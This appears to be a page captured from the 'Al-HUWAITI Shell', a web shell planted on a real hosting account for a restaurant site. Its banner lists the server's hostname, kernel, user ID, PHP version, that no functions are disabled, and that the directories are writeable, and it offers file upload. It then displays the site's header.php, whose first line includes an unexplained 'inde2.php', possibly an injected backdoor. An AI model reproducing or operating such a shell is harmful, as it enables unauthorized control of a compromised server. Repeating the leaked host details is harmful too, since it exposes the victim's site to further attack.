Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux us-phx-web1202.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64
User : u615232177 ( 615232177)
PHP Version : 8.1.33
Disable Function : NONE
Directory :  /home/u615232177/domains/bottlesrepublik.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u615232177/domains/bottlesrepublik.com/public_html/header.php
<?php include("inde2.php"); ?>
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Favicon -->
    <link rel="icon" href="img/favicon.png">

    <!-- Core Stylesheet -->
    <link href="style.css" rel="stylesheet">

    <!-- Responsive CSS -->
    <link href="css/responsive/responsive.css" rel="stylesheet">
    <script src='https://www.google.com/recaptcha/api.js'></script>
</head>

<body>
    <!-- Preloader -->
   

    <!-- ***** Search Form Area ***** -->
    <div class="caviar-search-form d-flex align-items-center">
        <div class="container">
            <div class="row">
                <div class="col-12">
                    <div class="search-close-btn" id="closeBtn">
                        <i class="pe-7s-close-circle" aria-hidden="true"></i>
                    </div>
                    <form action="#" method="get">
                        <input type="search" name="caviarSearch" id="search" placeholder=" ...">
                        <input type="submit" class="d-none" value="submit">
                    </form>
                </div>
            </div>
        </div>
    </div>

    <!-- ***** Header Area Start ***** -->
    <header class="header_area" id="header">
        <div class="container h-100">
            <div class="row h-100">
                <div class="col-12 h-100">
                    <nav class="h-100 navbar navbar-expand-lg align-items-center">
                        <a class="navbar-brand" href="index.php">
                          <img src="img/logo.png" alt="">
                        </a>
                        <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#caviarNav" aria-controls="caviarNav" aria-expanded="false" aria-label="Toggle navigation"><span class="fa fa-bars"></span></button>
                        <div class="collapse navbar-collapse" id="caviarNav">
                            <ul class="navbar-nav ml-auto" id="caviarMenu">
                                <!--<li class="nav-item <?php if($page_name == "index.php"){echo "active";} ?>">
                                    <a class="nav-link" href="index.php">Home</a>
                                </li>-->
                                <li class="nav-item <?php if($page_name == "about.php"){echo "active";} ?>">
                                    <a class="nav-link" href="about.php">About</a>
                                </li>
                                <li class="nav-item <?php if($page_name == "events.php"){echo "active";} ?>">
                                    <a class="nav-link" href="events.php">Events</a>
                                </li>
                               
                                <li class="nav-item dropdown">
                                    <a class="nav-link dropdown-toggle" href="#" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">Menu</a>
                                    <div class="dropdown-menu" aria-labelledby="navbarDropdown">
                                        <a class="dropdown-item" href="menu.php">Full Menu</a>
                                        <?php
                                        $yes="Yes";
	$stmt = $con -> prepare('SELECT * FROM menu_categories WHERE featured = ?');
    $stmt -> bind_param('s',$yes); 
	$stmt -> execute(); 
	$stmt -> store_result(); 
	$stmt -> bind_result($cida,$category_namea,$pictureaa,$featureda); 
	$numrows = $stmt -> num_rows();
	if($numrows > 0){
		while ($stmt -> fetch()) { 
?>
   <a class="dropdown-item" href="menu_details.php?cat=<?php echo $category_namea ?>"><?php echo $category_namea ?></a> 
<?php }} ?>

</div>
                                </li>

                                <li class="nav-item dropdown">
                                    <a class="nav-link dropdown-toggle" href="#" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">Max Bottles</a>
                                    <div class="dropdown-menu" aria-labelledby="navbarDropdown">
                                        <a class="dropdown-item" href="max_bottles.php">Full Menu</a>
                                        <?php
                                        $yes="Yes";
	$stmt_max = $con -> prepare('SELECT * FROM max_bottles_categories WHERE featured = ?');
    $stmt_max -> bind_param('s',$yes); 
	$stmt_max -> execute(); 
	$stmt_max -> store_result(); 
	$stmt_max -> bind_result($cidaa,$category_name_max,$picture_max,$featured_max); 
	$numrows_max = $stmt_max -> num_rows();
	if($numrows_max > 0){
		while ($stmt_max -> fetch()) { 
?>
   <a class="dropdown-item" href="max_bottles_details.php?cat=<?php echo $category_name_max ?>"><?php echo $category_name_max ?></a> 
<?php }} ?>

</div>
                                </li>

                                <li class="nav-item dropdown">
                                    <a class="nav-link dropdown-toggle" href="#" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">Pool Menu</a>
                                    <div class="dropdown-menu" aria-labelledby="navbarDropdown">
                                        <a class="dropdown-item" href="swimming_pool.php">Full Services</a>
                                        <?php
                                        $yes="Yes";
	$stmt_swim = $con -> prepare('SELECT * FROM swimming_pool_categories WHERE featured = ?');
    $stmt_swim -> bind_param('s',$yes); 
	$stmt_swim -> execute(); 
	$stmt_swim -> store_result(); 
	$stmt_swim -> bind_result($cidaaa,$category_name_swim,$picture_swim,$featured_swim); 
	$numrows_swim = $stmt_swim -> num_rows();
	if($numrows_swim > 0){
		while ($stmt_swim -> fetch()) { 
?>
   <a class="dropdown-item" href="swimming_pool_details.php?cat=<?php echo $category_name_swim ?>"><?php echo $category_name_swim ?></a> 
<?php }} ?>

</div>
                                </li>

                                
                               
                                <li class="nav-item <?php if($page_name == "gallery.php"){echo "active";} ?>">
                                    <a class="nav-link" href="gallery.php">Gallery</a>
                                </li>
                                <li class="nav-item <?php if($page_name == "reservations.php"){echo "active";} ?>">
                                    <a class="nav-link" href="reservations.php">Reservations</a>
                                </li>
                                
                                <li class="nav-item <?php if($page_name == "contact.php"){echo "active";} ?>">
                                    <a class="nav-link" href="contact.php">Contact</a>
                                </li>
                            </ul>
                            <!-- Search Btn -->
                            
                        </div>
                    </nav>
                </div>
            </div>
        </div>
    </header>
    <!-- ***** Header Area End ***** -->

Al-HUWAITI Shell